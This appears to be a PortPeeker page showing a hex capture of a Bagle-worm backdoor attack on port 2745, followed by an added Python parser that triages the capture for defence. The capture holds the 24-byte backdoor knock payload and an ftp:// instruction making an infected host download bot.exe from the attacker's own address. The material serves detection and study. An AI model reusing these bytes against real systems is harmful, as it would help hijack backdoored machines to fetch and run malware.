PortPeeker Capture of 2745 Attack Attempt
TCP port 2745 is the backdoor listener opened by several variants of the Bagle/Beagle
worm. The capture below shows an attack against a PortPeeker listener on that port: the
attacker first sends a 24-byte payload to the backdoor and then sends a NUL-terminated
ftp:// URL instructing the (presumed) Bagle-infected host to download an executable,
bot.exe, from the attacking system itself (the URL points back at the attacker's own
address, 68.8.44.240). At the time of capture this was the most common attack seen on
this port. Note that the "Data Sent" section is PortPeeker's own canned reply ("Go
Away..") to the connecting host, not traffic generated by the backdoor.
68.8.44.240 : 4622 TCP Data In Length 24 bytes
MD5 = 46EE69DF75A57979E39CF89C71B3618E
---- 12/05/2004 03:24:22.872
0000 43 FF FF FF 30 30 30 01 0A 28 91 A1 2B E6 60 2F C...000..(..+.`/
0010 32 8F 60 15 1A 20 1A 00 2.`.. ..
---- Data Sent
0000 47 6F 20 41 77 61 79 2E 2E Go Away..
68.8.44.240 : 4622 TCP Data In Length 40 bytes
MD5 = 6BE5C3D5EBAF87EE197CDFEA805B55B9
---- 12/05/2004 03:24:23.133
0000 66 74 70 3A 2F 2F 62 6C 61 3A 62 6C 61 40 36 38 ftp://bla:bla@68
0010 2E 38 2E 34 34 2E 32 34 30 3A 32 38 38 35 36 2F .8.44.240:28856/
0020 62 6F 74 2E 65 78 65 00 bot.exe.
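The following is an added example, not part of the original page or of PortPeeker: a small Python parser for the PortPeeker dump format shown above, which recovers the raw bytes of each payload using the declared "Length" (so the ASCII column can never be mistaken for hex), recomputes the MD5 that PortPeeker recorded for each inbound payload as a transcription check, extracts the ftp:// URL (credentials, host, port, path) the attacker pushes, and flags the leading bytes of the first payload. Treating the 43 FF FF FF 30 30 30 prefix as a Bagle 2745 marker is an assumption drawn from this single capture, not from any published specification; the capture itself is embedded as constructed input.

```python
"""Parse a PortPeeker hex dump and triage a Bagle port-2745 session.

Added example for this page; not PortPeeker or LinkLogger code.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed input: the capture from this page, transcribed verbatim.
PORTPEEKER_DUMP = """\
68.8.44.240 : 4622 TCP Data In Length 24 bytes
MD5 = 46EE69DF75A57979E39CF89C71B3618E
---- 12/05/2004 03:24:22.872
0000 43 FF FF FF 30 30 30 01 0A 28 91 A1 2B E6 60 2F C...000..(..+.`/
0010 32 8F 60 15 1A 20 1A 00 2.`.. ..
---- Data Sent
0000 47 6F 20 41 77 61 79 2E 2E Go Away..
68.8.44.240 : 4622 TCP Data In Length 40 bytes
MD5 = 6BE5C3D5EBAF87EE197CDFEA805B55B9
---- 12/05/2004 03:24:23.133
0000 66 74 70 3A 2F 2F 62 6C 61 3A 62 6C 61 40 36 38 ftp://bla:bla@68
0010 2E 38 2E 34 34 2E 32 34 30 3A 32 38 38 35 36 2F .8.44.240:28856/
0020 62 6F 74 2E 65 78 65 00 bot.exe.
"""

# Assumption: the prefix of the first inbound payload in this capture is used as the
# Bagle 2745 "hello" marker. Inferred from this one sample only.
BAGLE_HELLO_PREFIX = bytes.fromhex("43FFFFFF303030")

HEADER_RE = re.compile(r"^(\S+) : (\d+) TCP Data In Length (\d+) bytes$")
HEX_LINE_RE = re.compile(r"^[0-9A-Fa-f]{4}((?: [0-9A-Fa-f]{2})+)")


@dataclass
class Payload:
    direction: str                      # "in" = attacker -> listener, "sent" = PortPeeker reply
    src: str = ""
    sport: int = 0
    declared_len: Optional[int] = None  # "Length N bytes" from the header, if any
    md5: Optional[str] = None           # MD5 PortPeeker recorded, if any
    data: bytearray = field(default_factory=bytearray)


def parse_portpeeker_dump(text: str) -> List[Payload]:
    """Split a PortPeeker dump into payloads, reading the hex column of each dump line."""
    payloads: List[Payload] = []
    cur: Optional[Payload] = None
    for line in text.splitlines():
        line = line.rstrip()
        m = HEADER_RE.match(line)
        if m:
            cur = Payload("in", m.group(1), int(m.group(2)), int(m.group(3)))
            payloads.append(cur)
            continue
        if line == "---- Data Sent":
            cur = Payload("sent")
            payloads.append(cur)
            continue
        if line.startswith("MD5 = ") and cur is not None:
            cur.md5 = line[len("MD5 = "):].strip().upper()
            continue
        m = HEX_LINE_RE.match(line)
        if m and cur is not None:
            # Consume at most the declared length so the trailing ASCII column
            # (which can look like hex, e.g. "bo" in "bot.exe") never becomes data.
            hexbytes = m.group(1).split()
            if cur.declared_len is not None:
                hexbytes = hexbytes[: cur.declared_len - len(cur.data)]
            cur.data.extend(int(h, 16) for h in hexbytes)
    return payloads


def is_bagle_hello(data: bytes) -> bool:
    """True if the payload starts with the (assumed) Bagle 2745 hello prefix."""
    return bytes(data).startswith(BAGLE_HELLO_PREFIX)


def extract_download_url(data: bytes) -> Optional[dict]:
    """Return the parts of the NUL-terminated ftp:// URL in a payload, or None."""
    raw = bytes(data).split(b"\x00", 1)[0]
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text.lower().startswith("ftp://"):
        return None
    u = urlsplit(text)
    return {"scheme": u.scheme, "username": u.username, "password": u.password,
            "host": u.hostname, "port": u.port, "path": u.path}


def md5_matches(p: Payload) -> Optional[bool]:
    """Recompute MD5 over the parsed bytes and compare with PortPeeker's recorded value."""
    if p.md5 is None:
        return None
    return hashlib.md5(bytes(p.data)).hexdigest().upper() == p.md5


def triage(text: str) -> dict:
    """Summarise one session: attacker, hello seen, integrity checks, pushed URLs."""
    payloads = parse_portpeeker_dump(text)
    inbound = [p for p in payloads if p.direction == "in"]
    urls = [u for p in inbound for u in [extract_download_url(p.data)] if u]
    reply = next((p.data for p in payloads if p.direction == "sent"), b"")
    return {
        "attacker": inbound[0].src if inbound else None,
        "bagle_hello": any(is_bagle_hello(p.data) for p in inbound),
        "length_ok": all(len(p.data) == p.declared_len for p in inbound),
        "md5_ok": all(md5_matches(p) for p in inbound),
        "download_urls": urls,
        "listener_reply": bytes(reply),
    }


if __name__ == "__main__":
    for key, value in triage(PORTPEEKER_DUMP).items():
        print(f"{key}: {value}")
```

The URL is parsed rather than string-matched so that the host and port the infected machine would connect to (68.8.44.240:28856 here, the attacker's own address) can be fed straight into a block list or a hunt across other captures, while the length and MD5 checks guard against a mis-copied hex line silently changing the indicator.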
While PortPeeker is not an officially supported product, if you have any
suggestions or find any bugs, please send them to PortPeeker@LinkLogger.com.